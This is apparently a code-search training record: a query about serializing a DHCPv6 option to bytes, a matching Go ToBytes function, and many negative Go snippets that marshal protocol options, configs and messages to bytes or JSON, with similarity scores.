*GetCatalogItemsUUIDDefault) Code() int {\n\treturn o._statusCode\n}", "func (o *DescribeServerOK) Code() int {\n\treturn 200\n}", "func (h *RegisterAccountHandler) Code() int {\n\treturn gamedefine.RegisterAccount\n}", "func (s *DryRunOperationException) Code() string {\n\treturn \"DryRunOperationException\"\n}", "func (s *ConnectorTimeoutException) Code() string {\n\treturn \"ConnectorTimeoutException\"\n}", "func (s *UnauthorizedOperationException) Code() string {\n\treturn \"UnauthorizedOperationException\"\n}", "func (v *Validator) Code(att *design.AttributeDefinition, nonzero, required, hasDefault bool, target, context string, depth int, private bool) string {\n\tif _, ok := att.Metadata[\"struct:field:type\"]; ok {\n\t\t// Skip validation generation for attributes with custom types\n\t\treturn \"\"\n\t}\n\tbuf := v.recurse(att, nonzero, required, hasDefault, target, context, depth, private)\n\treturn buf.String()\n}", "func (s *FileSystemInUse) Code() string {\n\treturn \"FileSystemInUse\"\n}", "func (e *CommandError) Code() int {\n\treturn e.code\n}", "func (o *GetAdmissionPluginDefault) Code() int {\n\treturn o._statusCode\n}", "func (o *PerformIncidentActionDefault) Code() int {\n\treturn o._statusCode\n}", "func (s Style) Code() string {\n\treturn s.String()\n}", "func (s *InvalidPolicyDocument) Code() string {\n\treturn \"InvalidPolicyDocument\"\n}", "func (o *GetSiteAssetInfoDefault) Code() int {\n\treturn o._statusCode\n}", "func (o *SignupDefault) Code() int {\n\treturn o._statusCode\n}", "func (o *GetPassesDefault) Code() int {\n\treturn o._statusCode\n}", "func (o *GetLibcVersionDefault) Code() int {\n\treturn o._statusCode\n}", "func (o *GetServerConfigImportsMoidDefault) Code() int {\n\treturn o._statusCode\n}", "func (o *CreateSettingsReportingEulaItemDefault) Code() int {\n\treturn o._statusCode\n}", "func (o *UpdatePrivilegeForbidden) Code() int {\n\treturn 403\n}", "func (s *PolicyNotFoundException) Code() string {\n\treturn \"PolicyNotFoundException\"\n}", "func (o *UpdateBuildScriptDefault) Code() int {\n\treturn o._statusCode\n}", "func (o *TerminateInstanceDefault) Code() int {\n\treturn o._statusCode\n}", "func (s *MountTargetNotFound) Code() string {\n\treturn \"MountTargetNotFound\"\n}", "func (o *CreateTagDefault) Code() int {\n\treturn o._statusCode\n}", "func (o *GetServerConfigImportsDefault) Code() int {\n\treturn o._statusCode\n}", "func (s *PolicyNotFound) Code() string {\n\treturn \"PolicyNotFound\"\n}", "func (s *InsufficientThroughputCapacity) Code() string {\n\treturn \"InsufficientThroughputCapacity\"\n}", "func (s *NetworkInterfaceLimitExceeded) Code() string {\n\treturn \"NetworkInterfaceLimitExceeded\"\n}" ]
[ "0.72313315", "0.69734895", "0.6881529", "0.6850448", "0.6735197", "0.6698436", "0.66969913", "0.66453904", "0.6608055", "0.653936", "0.65173614", "0.6516536", "0.6487242", "0.64759696", "0.64638144", "0.6413874", "0.6338029", "0.6321097", "0.63162625", "0.631467", "0.63056934", "0.6299882", "0.62966216", "0.62748593", "0.6271707", "0.62513274", "0.6246698", "0.6221488", "0.6213717", "0.6193116", "0.61830187", "0.6177885", "0.6177602", "0.6175101", "0.617282", "0.616695", "0.6165672", "0.6162941", "0.61556536", "0.6151114", "0.61493796", "0.61460376", "0.61364293", "0.6122413", "0.6121955", "0.6120275", "0.6119982", "0.611724", "0.61155266", "0.61143476", "0.6111215", "0.6092625", "0.6090237", "0.6083421", "0.60797685", "0.607416", "0.60716015", "0.60678476", "0.60630053", "0.606007", "0.605526", "0.60533804", "0.6048731", "0.6047951", "0.6035529", "0.60338104", "0.60335696", "0.6031156", "0.60275054", "0.6026367", "0.6026043", "0.6019838", "0.6015517", "0.6006246", "0.60060406", "0.60008234", "0.59995013", "0.59943616", "0.5989312", "0.59871095", "0.5984613", "0.59824395", "0.59775746", "0.59768337", "0.5972772", "0.59724736", "0.59708184", "0.5965497", "0.595764", "0.5957411", "0.59508955", "0.5941913", "0.5941374", "0.5940591", "0.5938806", "0.5934852", "0.5931823", "0.5923375", "0.59227204", "0.5921908" ]
0.71896785
1
ToBytes serializes the option and returns it as a sequence of bytes
func (op *OptIAAddress) ToBytes() []byte { buf := uio.NewBigEndianBuffer(nil) buf.WriteBytes(op.IPv6Addr.To16()) buf.Write32(op.PreferredLifetime) buf.Write32(op.ValidLifetime) buf.WriteBytes(op.Options.ToBytes()) return buf.Data() }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func (op *OptVendorOpts) ToBytes() []byte {\n\tbuf := uio.NewBigEndianBuffer(nil)\n\tbuf.Write32(op.EnterpriseNumber)\n\tbuf.WriteData(op.VendorOpts.ToBytes())\n\treturn buf.Data()\n}", "func (op *optDNS) ToBytes() []byte {\n\tbuf := uio.NewBigEndianBuffer(nil)\n\tfor _, ns := range op.NameServers {\n\t\tbuf.WriteBytes(ns.To16())\n\t}\n\treturn buf.Data()\n}", "func serializeScanOptions(options *tree.ScanOptions) []byte {\n\tif options == nil {\n\t\treturn nil\n\t}\n\tperms := uint32(options.Perms)\n\tdata, err := proto.Marshal(&ScanOptions{\n\t\tExclude: options.Exclude,\n\t\tInclude: options.Include,\n\t\tFollow: options.Follow,\n\t\tPerms: &perms,\n\t\tReplica: &options.Replica,\n\t})\n\tif err != nil {\n\t\t// programming error?\n\t\tpanic(err)\n\t}\n\treturn data\n}", "func serializeOptions(gen workload.Generator) string {\n\tf, ok := gen.(workload.Flagser)\n\tif !ok {\n\t\treturn ``\n\t}\n\t// NB: VisitAll visits in a deterministic (alphabetical) order.\n\tvar buf bytes.Buffer\n\tflags := f.Flags()\n\tflags.VisitAll(func(f *pflag.Flag) {\n\t\tif flags.Meta != nil && flags.Meta[f.Name].RuntimeOnly {\n\t\t\treturn\n\t\t}\n\t\tif buf.Len() > 0 {\n\t\t\tbuf.WriteString(`,`)\n\t\t}\n\t\tfmt.Fprintf(&buf, `%s=%s`, url.PathEscape(f.Name), url.PathEscape(f.Value.String()))\n\t})\n\treturn buf.String()\n}", "func (o DistinctOption) MarshalJSON() ([]byte, error) {\n\treturn json.Marshal(o.value)\n}", "func (m *TCPOption) MarshalJSON() ([]byte, error) {\n\tif m == nil {\n\t\treturn json.Marshal(nil)\n\t}\n\tbuf := &bytes.Buffer{}\n\tif err := TCPOptionJSONMarshaler.Marshal(buf, m); err != nil {\n\t return nil, err\n\t}\n\treturn buf.Bytes(), nil\n}", "func (m *RedisOption) MarshalJSON() ([]byte, error) {\n\tif m == nil {\n\t\treturn json.Marshal(nil)\n\t}\n\tbuf := &bytes.Buffer{}\n\tif err := RedisOptionJSONMarshaler.Marshal(buf, m); err != nil {\n\t return nil, err\n\t}\n\treturn buf.Bytes(), nil\n}", "func OptionsBytes(url string, data ...interface{}) []byte {\n\treturn RequestBytes(\"OPTIONS\", url, data...)\n}", "func (p *TOMLParser) ToBytes(value interface{}, options ...ReadWriteOption) ([]byte, error) {\n\tbuf := new(bytes.Buffer)\n\n\tenc := toml.NewEncoder(buf)\n\n\tcolourise := false\n\n\tfor _, o := range options {\n\t\tswitch o.Key {\n\t\tcase OptionIndent:\n\t\t\tif indent, ok := o.Value.(string); ok {\n\t\t\t\tenc.Indent = indent\n\t\t\t}\n\t\tcase OptionColourise:\n\t\t\tif value, ok := o.Value.(bool); ok {\n\t\t\t\tcolourise = value\n\t\t\t}\n\t\t}\n\t}\n\n\tswitch d := value.(type) {\n\tcase SingleDocument:\n\t\tif err := enc.Encode(d.Document()); err != nil {\n\t\t\tif err.Error() == errStr {\n\t\t\t\tbuf.Write([]byte(fmt.Sprintf(\"%v\\n\", d.Document())))\n\t\t\t} else {\n\t\t\t\treturn nil, err\n\t\t\t}\n\t\t}\n\tcase MultiDocument:\n\t\tfor _, dd := range d.Documents() {\n\t\t\tif err := enc.Encode(dd); err != nil {\n\t\t\t\tif err.Error() == errStr {\n\t\t\t\t\tbuf.Write([]byte(fmt.Sprintf(\"%v\\n\", dd)))\n\t\t\t\t} else {\n\t\t\t\t\treturn nil, err\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\tdefault:\n\t\tif err := enc.Encode(d); err != nil {\n\t\t\tif err.Error() == errStr {\n\t\t\t\tbuf.Write([]byte(fmt.Sprintf(\"%v\\n\", d)))\n\t\t\t} else {\n\t\t\t\treturn nil, err\n\t\t\t}\n\t\t}\n\t}\n\n\tif colourise {\n\t\tif err := ColouriseBuffer(buf, \"toml\"); err != nil {\n\t\t\treturn nil, fmt.Errorf(\"could not colourise output: %w\", err)\n\t\t}\n\t}\n\n\treturn buf.Bytes(), nil\n}", "func (m *MySQLOption) MarshalJSON() ([]byte, error) {\n\tif m == nil {\n\t\treturn json.Marshal(nil)\n\t}\n\tbuf := &bytes.Buffer{}\n\tif err := MySQLOptionJSONMarshaler.Marshal(buf, m); err != nil {\n\t return nil, err\n\t}\n\treturn buf.Bytes(), nil\n}", "func (o Options) Printable() ([]byte, error) {\n\toptJSON, err := json.Marshal(o)\n\tif err != nil {\n\t\treturn nil, errors.Wrap(err, \"unable to convert config to JSON\")\n\t}\n\treturn optJSON, nil\n}", "func (op *optClientLinkLayerAddress) ToBytes() []byte {\n\tbuf := uio.NewBigEndianBuffer(nil)\n\tbuf.Write16(uint16(op.LinkLayerType))\n\tbuf.WriteBytes(op.LinkLayerAddress)\n\treturn buf.Data()\n}", "func Bytes() []byte {\n\treturn conf.Bytes()\n}", "func (im IPMask) ToBytes() []byte {\n\tif len(im) > net.IPv4len {\n\t\treturn im[:net.IPv4len]\n\t}\n\treturn im\n}", "func (a *AttributeEndorsement) ToBytes() []byte {\n\tif bytes, err := json.Marshal(a); err != nil {\n\t\tlogger.Debug(\"Failed to json serialize: %s\", err)\n\t\treturn nil\n\t} else {\n\t\treturn bytes\n\t}\n}", "func (c *Configuration) Serialize() []byte {\n\tb := make([]byte, confLength)\n\tb[0] = byte(c.Group)\n\tb[1] = byte(c.KDF)\n\tb[2] = byte(c.MAC)\n\tb[3] = byte(c.Hash)\n\tb[4] = byte(c.MHF)\n\tb[5] = byte(c.Mode)\n\tb[6] = encoding.I2OSP(c.NonceLen, 1)[0]\n\n\treturn b\n}", "func Serialize(msg *CoAPMessage) ([]byte, error) {\n\tif option := msg.GetOption(OptionURIScheme); option != nil {\n\t\tif option.Value == nil || option.IntValue() != COAPS_SCHEME {\n\t\t\tmsg.AddOption(OptionURIScheme, COAP_SCHEME)\n\t\t}\n\t}\n\n\tmessageID := []byte{0, 0}\n\tbinary.BigEndian.PutUint16(messageID, msg.MessageID)\n\n\tbuf := bytes.Buffer{}\n\tbuf.Write([]byte{(1 << 6) | (uint8(msg.Type) << 4) | 0x0f&uint8(len(msg.Token))})\n\tbuf.Write([]byte{byte(msg.Code)})\n\tbuf.Write([]byte{messageID[0]})\n\tbuf.Write([]byte{messageID[1]})\n\tbuf.Write(msg.Token)\n\n\t// Sort Options\n\tsort.Sort(sortOptions(msg.Options))\n\n\tlastOptionCode := 0\n\tfor _, opt := range msg.Options {\n\t\toptCode := int(opt.Code)\n\t\toptDelta := optCode - lastOptionCode\n\t\toptDeltaValue, _ := getOptionHeaderValue(optDelta)\n\t\tbyteValue := valueToBytes(opt.Value)\n\t\tvalueLength := len(byteValue)\n\t\toptLength := valueLength\n\t\toptLengthValue, _ := getOptionHeaderValue(optLength)\n\n\t\t// Option Header\n\t\tbuf.Write([]byte{byte(optDeltaValue<<4 | optLengthValue)})\n\n\t\t// Extended Delta & Length\n\t\tif optDeltaValue == 13 {\n\t\t\toptDelta -= 13\n\t\t\tbuf.Write([]byte{byte(optDelta)})\n\t\t} else if optDeltaValue == 14 {\n\t\t\ttmpBuf := new(bytes.Buffer)\n\t\t\toptDelta -= 269\n\t\t\tbinary.Write(tmpBuf, binary.BigEndian, uint16(optDelta))\n\t\t\tbuf.Write(tmpBuf.Bytes())\n\t\t}\n\n\t\tif optLengthValue == 13 {\n\t\t\toptLength -= 13\n\t\t\tbuf.Write([]byte{byte(optLength)})\n\t\t} else if optLengthValue == 14 {\n\t\t\ttmpBuf := new(bytes.Buffer)\n\t\t\toptLength -= 269\n\t\t\tbinary.Write(tmpBuf, binary.BigEndian, uint16(optLength))\n\t\t\tbuf.Write(tmpBuf.Bytes())\n\t\t}\n\n\t\t// Option Value\n\t\tbuf.Write(byteValue)\n\t\tlastOptionCode = optCode\n\t}\n\n\tif msg.Payload != nil && msg.Payload.Length() > 0 {\n\t\tbuf.Write([]byte{PayloadMarker})\n\t\tbuf.Write(msg.Payload.Bytes())\n\t}\n\n\treturn buf.Bytes(), nil\n}", "func (u *DeploymentOption) SerializeValue(v interface{}) string {\n\tbyteArray, err := json.Marshal(v)\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t\treturn \"\"\n\t}\n\treturn string(byteArray)\n}", "func (v *VendorOpts) MarshalBinary() ([]byte, error) {\n\t// 4 bytes: EnterpriseNumber\n\t// N bytes: options slice byte count\n\tb := buffer.New(nil)\n\tb.Write32(v.EnterpriseNumber)\n\topts, err := v.Options.MarshalBinary()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tb.WriteBytes(opts)\n\n\treturn b.Data(), nil\n}", "func (d *DHCPv4) ToBytes() []byte {\n\tbuf := uio.NewBigEndianBuffer(make([]byte, 0, minPacketLen))\n\tbuf.Write8(uint8(d.OpCode))\n\tbuf.Write8(uint8(d.HWType))\n\n\t// HwAddrLen\n\thlen := uint8(len(d.ClientHWAddr))\n\tbuf.Write8(hlen)\n\tbuf.Write8(d.HopCount)\n\tbuf.WriteBytes(d.TransactionID[:])\n\tbuf.Write16(d.NumSeconds)\n\tbuf.Write16(d.Flags)\n\n\twriteIP(buf, d.ClientIPAddr)\n\twriteIP(buf, d.YourIPAddr)\n\twriteIP(buf, d.ServerIPAddr)\n\twriteIP(buf, d.GatewayIPAddr)\n\tcopy(buf.WriteN(16), d.ClientHWAddr)\n\n\tvar sname [64]byte\n\tcopy(sname[:63], []byte(d.ServerHostName))\n\tbuf.WriteBytes(sname[:])\n\n\tvar file [128]byte\n\tcopy(file[:127], []byte(d.BootFileName))\n\tbuf.WriteBytes(file[:])\n\n\t// The magic cookie.\n\tbuf.WriteBytes(magicCookie[:])\n\n\t// Write all options.\n\td.Options.Marshal(buf)\n\n\t// DHCP is based on BOOTP, and BOOTP messages have a minimum length of\n\t// 300 bytes per RFC 951. This not stated explicitly, but if you sum up\n\t// all the bytes in the message layout, you'll get 300 bytes.\n\t//\n\t// Some DHCP servers and relay agents care about this BOOTP legacy B.S.\n\t// and \"conveniently\" drop messages that are less than 300 bytes long.\n\t//\n\t// We subtract one byte for the OptionEnd option.\n\tif buf.Len()+1 < bootpMinLen {\n\t\tbuf.WriteBytes(bytes.Repeat([]byte{OptionPad.Code()}, bootpMinLen-1-buf.Len()))\n\t}\n\n\t// Finish the packet.\n\tbuf.Write8(OptionEnd.Code())\n\n\treturn buf.Data()\n}", "func (cfg frozenConfig) Marshal(val interface{}) ([]byte, error) {\n return encoder.Encode(val, cfg.encoderOpts)\n}", "func (s AudioCodecOptions) String() string {\n\treturn awsutil.Prettify(s)\n}", "func TestVendorOptsMarshalBinary(t *testing.T) {\n\tvar tests = []struct {\n\t\tdesc string\n\t\tbuf []byte\n\t\tvendorOpts *VendorOpts\n\t}{\n\t\t{\n\t\t\tdesc: \"all zero values\",\n\t\t\tbuf: bytes.Repeat([]byte{0}, 4),\n\t\t\tvendorOpts: &VendorOpts{},\n\t\t},\n\t\t{\n\t\t\tdesc: \"[0, 0, 5, 0x58] EnterpriseNumber, [1: []byte{3, 4}, 2: []byte{0x04, 0xa3, 0x9e}] vendorOpts\",\n\t\t\tbuf: []byte{\n\t\t\t\t0, 0, 5, 0x58,\n\t\t\t\t0, 1, 0, 2, 3, 4,\n\t\t\t\t0, 2, 0, 3, 0x04, 0xa3, 0x9e,\n\t\t\t},\n\t\t\tvendorOpts: &VendorOpts{\n\t\t\t\tEnterpriseNumber: 1368,\n\t\t\t\tOptions: dhcp6.Options{\n\t\t\t\t\t1: [][]byte{\n\t\t\t\t\t\t{3, 4},\n\t\t\t\t\t},\n\t\t\t\t\t2: [][]byte{\n\t\t\t\t\t\t{0x04, 0xa3, 0x9e},\n\t\t\t\t\t},\n\t\t\t\t},\n\t\t\t},\n\t\t},\n\t}\n\n\tfor i, tt := range tests {\n\t\twant := tt.buf\n\t\tgot, err := tt.vendorOpts.MarshalBinary()\n\t\tif err != nil {\n\t\t\tt.Fatal(err)\n\t\t}\n\t\tif !bytes.Equal(want, got) {\n\t\t\tt.Fatalf(\"[%02d] test %q, unexpected VendorOpts bytes for MarshalBinary(%v)\\n- want: %v\\n- got: %v\",\n\t\t\t\ti, tt.desc, tt.buf, want, got)\n\t\t}\n\t}\n}", "func (config *YubiKeyConfig) Bytes() []byte {\n\tenc := &tlv.Encoder{}\n\tenc.Encode(config.Key)\n\tenc.Encode(config.Counter)\n\tenc.Encode(config.Public)\n\treturn enc.Bytes()\n}", "func (opts *CreateDocumentOpts) Marshal() ([]byte, error) {\n\treturn json.Marshal(opts)\n}", "func (s VersionOptions) String() string {\n\treturn awsutil.Prettify(s)\n}", "func optionsToArray(options []byte) *[maxOptionSize]byte {\n\t// Reslice to full capacity.\n\toptions = options[0:maxOptionSize]\n\treturn (*[maxOptionSize]byte)(unsafe.Pointer((*reflect.SliceHeader)(unsafe.Pointer(&options)).Data))\n}", "func (s VcfOptions) String() string {\n\treturn awsutil.Prettify(s)\n}", "func (c ContentKeyPolicyOption) MarshalJSON() ([]byte, error) {\n\tobjectMap := make(map[string]any)\n\tpopulate(objectMap, \"configuration\", c.Configuration)\n\tpopulate(objectMap, \"name\", c.Name)\n\tpopulate(objectMap, \"policyOptionId\", c.PolicyOptionID)\n\tpopulate(objectMap, \"restriction\", c.Restriction)\n\treturn json.Marshal(objectMap)\n}", "func (v Version) ToBytes() []byte {\n\treturn []byte{\n\t\tv.Major,\n\t\tv.Minor,\n\t\tv.Patch,\n\t}\n}", "func (opt *MainOpt) Write() error {\n\n\tvar out bytes.Buffer\n\topt.UpdateOptions()\n\n\tjsonData, err := json.Marshal(&opt)\n\tif err != nil {\n\t\treturn err\n\t} else if err = json.Indent(&out, jsonData, \"\", \"\\t\"); err == nil {\n\t\treturn ioutil.WriteFile(optFilename, out.Bytes(), 0644)\n\t}\n\treturn err\n}", "func (v *Value) Bytes() []byte {\n switch d := v.data.(type) {\n case []byte:\n return d\n case string:\n return []byte(d)\n default:\n if j, e := json.Marshal(v.data); e == nil {\n return j\n }\n return []byte(fmt.Sprintf(\"%+v\", v.data))\n }\n}", "func (m *SELinuxStrategyOptions) ToJSON() (string, error) {\n\treturn codec.ToJSON(m)\n}", "func (op *OptDHCPv4Msg) ToBytes() []byte {\n\treturn op.Msg.ToBytes()\n}", "func (bjo BatchJobOptions) MarshalJSON() ([]byte, error) {\n\tobjectMap := make(map[string]interface{})\n\tif bjo.Tags != nil {\n\t\tobjectMap[\"tags\"] = bjo.Tags\n\t}\n\tif bjo.ArtifactID != nil {\n\t\tobjectMap[\"artifactId\"] = bjo.ArtifactID\n\t}\n\tif bjo.Name != nil {\n\t\tobjectMap[\"name\"] = bjo.Name\n\t}\n\tif bjo.File != nil {\n\t\tobjectMap[\"file\"] = bjo.File\n\t}\n\tif bjo.ClassName != nil {\n\t\tobjectMap[\"className\"] = bjo.ClassName\n\t}\n\tif bjo.Arguments != nil {\n\t\tobjectMap[\"args\"] = bjo.Arguments\n\t}\n\tif bjo.Jars != nil {\n\t\tobjectMap[\"jars\"] = bjo.Jars\n\t}\n\tif bjo.PythonFiles != nil {\n\t\tobjectMap[\"pyFiles\"] = bjo.PythonFiles\n\t}\n\tif bjo.Files != nil {\n\t\tobjectMap[\"files\"] = bjo.Files\n\t}\n\tif bjo.Archives != nil {\n\t\tobjectMap[\"archives\"] = bjo.Archives\n\t}\n\tif bjo.Configuration != nil {\n\t\tobjectMap[\"conf\"] = bjo.Configuration\n\t}\n\tif bjo.DriverMemory != nil {\n\t\tobjectMap[\"driverMemory\"] = bjo.DriverMemory\n\t}\n\tif bjo.DriverCores != nil {\n\t\tobjectMap[\"driverCores\"] = bjo.DriverCores\n\t}\n\tif bjo.ExecutorMemory != nil {\n\t\tobjectMap[\"executorMemory\"] = bjo.ExecutorMemory\n\t}\n\tif bjo.ExecutorCores != nil {\n\t\tobjectMap[\"executorCores\"] = bjo.ExecutorCores\n\t}\n\tif bjo.ExecutorCount != nil {\n\t\tobjectMap[\"numExecutors\"] = bjo.ExecutorCount\n\t}\n\treturn json.Marshal(objectMap)\n}", "func (ba *FilterBitArray) ToBytes() []byte {\n\treturn *ba\n}", "func (config *TOTPConfig) Bytes() ([]byte, error) {\n\tenc := &tlv.Encoder{}\n\tenc.Encode(config.Key)\n\tenc.Encode(config.Start)\n\tenc.Encode(config.Step)\n\tenc.Encode(int32(config.Size))\n\tenc.Encode(int8(config.Algo))\n\tenc.Encode([]byte(config.Provider))\n\treturn enc.Bytes(), nil\n}", "func (v *Value) ToBytes() []byte {\n\tif v.Version == TypeNone {\n\t\tv.Version = ValueMetaVersion1\n\t}\n\n\tv.Updated = uint32(time.Now().Unix())\n\tif v.Created == 0 {\n\t\tv.Created = v.Updated\n\t}\n\n\tif v.Contents == nil {\n\t\tv.Contents = []byte{}\n\t}\n\n\tbuf := &bytes.Buffer{}\n\tbuf.WriteByte(v.Version)\n\tbuf.WriteByte(v.DataType)\n\tbuf.Write(encoding.Uint32ToBytes(v.Created))\n\tbuf.Write(encoding.Uint32ToBytes(v.Updated))\n\tbuf.Write(encoding.Uint32ToBytes(v.Expires))\n\tbuf.Write(v.Contents)\n\treturn buf.Bytes()\n}", "func (c *Capabilities) ToBytes(buf *bytes.Buffer) error {\n\tenc := gob.NewEncoder(buf)\n\tif err := enc.Encode(&c.Node); err != nil {\n\t\treturn err\n\t}\n\tif err := enc.Encode(&c.Ver); err != nil {\n\t\treturn err\n\t}\n\treturn enc.Encode(&c.Features)\n}", "func (fd FileDescriptor) toBytes() []byte {\n\tbuf := make([]byte, 0x27)\n\tbuf[0] = fd.TypeAndNameLength\n\tcopyBytes(buf[1:0x10], fd.FileName[:])\n\tbuf[0x10] = fd.FileType\n\tbinary.LittleEndian.PutUint16(buf[0x11:0x13], fd.KeyPointer)\n\tbinary.LittleEndian.PutUint16(buf[0x13:0x15], fd.BlocksUsed)\n\tcopyBytes(buf[0x15:0x18], fd.EOF[:])\n\tcopyBytes(buf[0x18:0x1c], fd.Creation.toBytes())\n\tbuf[0x1c] = fd.Version\n\tbuf[0x1d] = fd.MinVersion\n\tbuf[0x1e] = byte(fd.Access)\n\tbinary.LittleEndian.PutUint16(buf[0x1f:0x21], fd.AuxType)\n\tcopyBytes(buf[0x21:0x25], fd.LastMod.toBytes())\n\tbinary.LittleEndian.PutUint16(buf[0x25:0x27], fd.HeaderPointer)\n\treturn buf\n}", "func (es StoreEncryptionSpec) toEncryptionOptions() ([]byte, error) {\n\topts := EncryptionOptions{\n\t\tKeySource: EncryptionKeySource_KeyFiles,\n\t\tKeyFiles: &EncryptionKeyFiles{\n\t\t\tCurrentKey: es.KeyPath,\n\t\t\tOldKey: es.OldKeyPath,\n\t\t},\n\t\tDataKeyRotationPeriod: int64(es.RotationPeriod / time.Second),\n\t}\n\n\treturn protoutil.Marshal(&opts)\n}", "func (m VariableMultipliersServerExecutionOptions) MarshalJSON() ([]byte, error) {\n\t_parts := make([][]byte, 0, 1)\n\n\taO0, err := swag.WriteJSON(m.ServerTargetExecutionOptions)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\t_parts = append(_parts, aO0)\n\n\t// now for regular properties\n\tvar propsVariableMultipliersServerExecutionOptions struct {\n\t\tContinueOnError bool `json:\"continueOnError,omitempty\"`\n\n\t\tMaxConcurrency int32 `json:\"maxConcurrency,omitempty\"`\n\n\t\tMultipliers []string `json:\"multipliers\"`\n\t}\n\tpropsVariableMultipliersServerExecutionOptions.ContinueOnError = m.ContinueOnError\n\n\tpropsVariableMultipliersServerExecutionOptions.MaxConcurrency = m.MaxConcurrency\n\n\tpropsVariableMultipliersServerExecutionOptions.Multipliers = m.Multipliers\n\n\tjsonDataPropsVariableMultipliersServerExecutionOptions, errVariableMultipliersServerExecutionOptions := swag.WriteJSON(propsVariableMultipliersServerExecutionOptions)\n\tif errVariableMultipliersServerExecutionOptions != nil {\n\t\treturn nil, errVariableMultipliersServerExecutionOptions\n\t}\n\t_parts = append(_parts, jsonDataPropsVariableMultipliersServerExecutionOptions)\n\treturn swag.ConcatJSON(_parts...), nil\n}", "func (id UUID) Bytes() []byte {\n\treturn id[:]\n}", "func (g *GenOpts) JSON() ([]byte, error) {\n\treturn json.Marshal(g)\n}", "func cmdToBytes(cmd interface{}) []byte {\n\tvar buf bytes.Buffer\n\tenc := gob.NewEncoder(&buf)\n\tif err := enc.Encode(Command{Cmd: cmd}); nil != err {\n\t\tlog.Fatalf(\"failed to encode command: %s\", err)\n\t}\n\treturn buf.Bytes()\n}", "func Bytes() []byte {\n\treturn DefaultConfig.Bytes()\n}", "func (params ConsensusParamsInfo) Bytes() []byte {\n\treturn ser.MustEncodeToBytes(params)\n}", "func (f ServiceFlags) Bytes() []byte {\n\tx := make([]byte, 8)\n\tvar b [4]byte\n\t*(*uint32)(unsafe.Pointer(&b)) = uint32(f)\n\tcopy(x[:4], b[:])\n\t*(*uint32)(unsafe.Pointer(&b)) = ^uint32(0)\n\tcopy(x[4:], b[:])\n\treturn x\n}", "func (v OutputProperty) Bytes() []byte {\n\tbuf := make([]byte, 28)\n\tb := 0\n\n\txgb.Put32(buf[b:], uint32(v.Window))\n\tb += 4\n\n\txgb.Put32(buf[b:], uint32(v.Output))\n\tb += 4\n\n\txgb.Put32(buf[b:], uint32(v.Atom))\n\tb += 4\n\n\txgb.Put32(buf[b:], uint32(v.Timestamp))\n\tb += 4\n\n\tbuf[b] = v.Status\n\tb += 1\n\n\tb += 11 // padding\n\n\treturn buf[:b]\n}", "func (s TsvVersionOptions) String() string {\n\treturn awsutil.Prettify(s)\n}", "func (sk *PrivKey) Bytes() []byte {\n\tif sk == nil {\n\t\treturn nil\n\t}\n\tfieldSize := (sk.Curve.Params().BitSize + 7) / 8\n\tbz := make([]byte, fieldSize)\n\tsk.D.FillBytes(bz)\n\treturn bz\n}", "func (so SessionOptions) MarshalJSON() ([]byte, error) {\n\tobjectMap := make(map[string]interface{})\n\tif so.Tags != nil {\n\t\tobjectMap[\"tags\"] = so.Tags\n\t}\n\tif so.ArtifactID != nil {\n\t\tobjectMap[\"artifactId\"] = so.ArtifactID\n\t}\n\tif so.Name != nil {\n\t\tobjectMap[\"name\"] = so.Name\n\t}\n\tif so.File != nil {\n\t\tobjectMap[\"file\"] = so.File\n\t}\n\tif so.ClassName != nil {\n\t\tobjectMap[\"className\"] = so.ClassName\n\t}\n\tif so.Arguments != nil {\n\t\tobjectMap[\"args\"] = so.Arguments\n\t}\n\tif so.Jars != nil {\n\t\tobjectMap[\"jars\"] = so.Jars\n\t}\n\tif so.PythonFiles != nil {\n\t\tobjectMap[\"pyFiles\"] = so.PythonFiles\n\t}\n\tif so.Files != nil {\n\t\tobjectMap[\"files\"] = so.Files\n\t}\n\tif so.Archives != nil {\n\t\tobjectMap[\"archives\"] = so.Archives\n\t}\n\tif so.Configuration != nil {\n\t\tobjectMap[\"conf\"] = so.Configuration\n\t}\n\tif so.DriverMemory != nil {\n\t\tobjectMap[\"driverMemory\"] = so.DriverMemory\n\t}\n\tif so.DriverCores != nil {\n\t\tobjectMap[\"driverCores\"] = so.DriverCores\n\t}\n\tif so.ExecutorMemory != nil {\n\t\tobjectMap[\"executorMemory\"] = so.ExecutorMemory\n\t}\n\tif so.ExecutorCores != nil {\n\t\tobjectMap[\"executorCores\"] = so.ExecutorCores\n\t}\n\tif so.ExecutorCount != nil {\n\t\tobjectMap[\"numExecutors\"] = so.ExecutorCount\n\t}\n\treturn json.Marshal(objectMap)\n}", "func (*ListOptionValue) Descriptor() ([]byte, []int) {\n\treturn file_ocis_messages_settings_v0_settings_proto_rawDescGZIP(), []int{15}\n}", "func anyToBytes(i interface{}) []byte {\n\tif i == nil {\n\t\treturn nil\n\t}\n\tswitch value := i.(type) {\n\tcase string:\n\t\treturn []byte(value)\n\tcase []byte:\n\t\treturn value\n\tdefault:\n\t\treturn encode(i)\n\t}\n}", "func (g G1) Bytes() []byte { return g.encodeBytes(false) }", "func (ti TypeItem) ToBytes() []byte {\n\treqBodyBytes := new(bytes.Buffer)\n\tjson.NewEncoder(reqBodyBytes).Encode(ti)\n\treturn reqBodyBytes.Bytes()\n}", "func (s OrderableDBInstanceOption) String() string {\n\treturn awsutil.Prettify(s)\n}", "func ToBytes(bits []bool) []byte {\n\tbs := make([]byte, (len(bits)+7)/8)\n\tfor i := 0; i < len(bits); i++ {\n\t\tif bits[i] {\n\t\t\tbs[i/8] |= (1 << 7) >> uint(i%8)\n\t\t}\n\t}\n\treturn bs\n}", "func ToJSONBytes(v interface{}) []byte {\n\tb, err := json.Marshal(v)\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\treturn b\n}", "func (p *RkPathAttr) Bytes() []byte {\n\tb := make([]byte, 48)\n\tp.Write(b)\n\treturn b\n}", "func (opts CreateOptions) Data() map[string][]byte {\n\treturn opts.toConfig().Data\n}", "func (d DhcpOptions) MarshalJSON() ([]byte, error) {\n\tobjectMap := make(map[string]any)\n\tpopulate(objectMap, \"dnsServers\", d.DNSServers)\n\treturn json.Marshal(objectMap)\n}", "func (s ReservedInstanceOptions) String() string {\n\treturn awsutil.Prettify(s)\n}", "func ValueToBytes(codec acodec.Codec, v interface{}) []byte {\n\tif v == nil {\n\t\treturn nil\n\t}\n\tvar (\n\t\terr error\n\t\tdata []byte\n\t)\n\tswitch vt := v.(type) 